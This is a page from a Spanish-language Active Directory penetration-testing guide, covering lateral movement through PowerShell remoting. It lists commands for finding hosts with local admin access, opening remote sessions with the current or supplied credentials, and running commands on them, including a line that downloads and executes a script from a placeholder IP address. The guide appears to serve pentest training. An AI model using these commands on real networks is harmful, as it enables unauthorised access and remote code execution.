馃數
Active Directory Penetration Testing
  • Inicio
  • General
    • Recursos de aprendizaje
    • Herramientas
  • Recolecci贸n de informaci贸n y enumeraci贸n
    • Bypass protecciones PowerShell scripts
    • LLMNR/NBT-NS poisoning
    • Enumeraci贸n no autenticada
      • Enumeraci贸n de usuarios y grupos
      • Enumeraci贸n de pol铆tica de contrase帽as
    • Password spraying
    • Enumeraci贸n autenticada
      • BloodHound
      • Domain Name System (DNS)
      • Enumeraci贸n de dominios
      • Enumeraci贸n de usuarios, grupos y computadoras
      • Enumeraci贸n de recursos compartidos
      • Enumeraci贸n de pol铆tica de contrase帽as
      • Enumeraci贸n de Group Policy Object (GPO)
      • Enumeraci贸n de Access Control List (ACL)
      • Enumeraci贸n de relaciones de confianza de dominio
  • Movimiento lateral
    • User hunting
    • Microsoft SQL Server (MSSQL)
    • PowerShell remoting
    • Remote Desktop Protocol (RDP)
    • Server Message Block (SMB)
    • Windows Remote Management (WinRM)
    • Pass the Hash (PtH)
    • Pass the Ticket (PtT)
  • Escalamiento de privilegios de dominio
    • Configuraciones incorrectas
    • Credential dumping
    • Usuarios y grupos
    • ASREPRoast
    • Kerberoast
    • DCSync
    • Unconstrained delegation
    • Constrained delegation
  • Escalamiento de privilegios en relaciones de confianza de dominio
    • Kerberoast
    • Foreign group membership
    • SID History
  • Persistencia
    • Golden Ticket
    • Silver Ticket
    • Skeleton Key
    • Directory Services Restore Mode (DSRM)
  • Vulnerabilidades
    • NoPac
    • PrintNightmare
Con tecnolog铆a de GitBook
En esta p谩gina

驴Te fue 煤til?

  1. Movimiento lateral

PowerShell remoting

Utilizando credenciales de sesi贸n actual.

# PowerView
# encontrar todas los hosts en el dominio actual donde el usuario actual tiene acceso de administrador local
Find-LocalAdminAccess

# Stateless (sin estado)
Enter-PSSession -ComputerName <computer-name>

# Stateful (con estado)
$session = New-PSSession -ComputerName <computer-name>
Enter-PSSession -Session $session

Utilizando credenciales de un usuario en particular.

$UserPassword = ConvertTo-SecureString "<password>" -AsPlainText -Force
$UserCredential = New-Object System.Management.Automation.PSCredential ("<ACME.LOCAL>\<user>", $UserPassword)
Enter-PSSession -ComputerName <computer-name> -Credential $UserCredential

Ejecuci贸n de comandos.

Invoke-Command -ComputerName <computer-name> -ScriptBlock {hostname; whoami; ipconfig}

Ejecuci贸n de script.

# Opci贸n 1
IEX (iwr http://<IP-address>:<port>/script.ps1 -UseBasicParsing)
$session = New-PSSession -ComputerName <computer-name>
Invoke-Command -Session $session -ScriptBlock ${function:<function-name>}

# Opci贸n 2
$session = New-PSSession -ComputerName <computer-name>
Invoke-Command -FilePath C:\<path>\script.ps1 -Session $session
Enter-PSSession -Session $session
<function-name>

# Opci贸n 3
Import-Module C:\<path>\script.ps1
Invoke-Command -ComputerName <computer-name> -ScriptBlock ${function:<function-name>}
AnteriorMicrosoft SQL Server (MSSQL)SiguienteRemote Desktop Protocol (RDP)

脷ltima actualizaci贸n hace 2 a帽os

驴Te fue 煤til?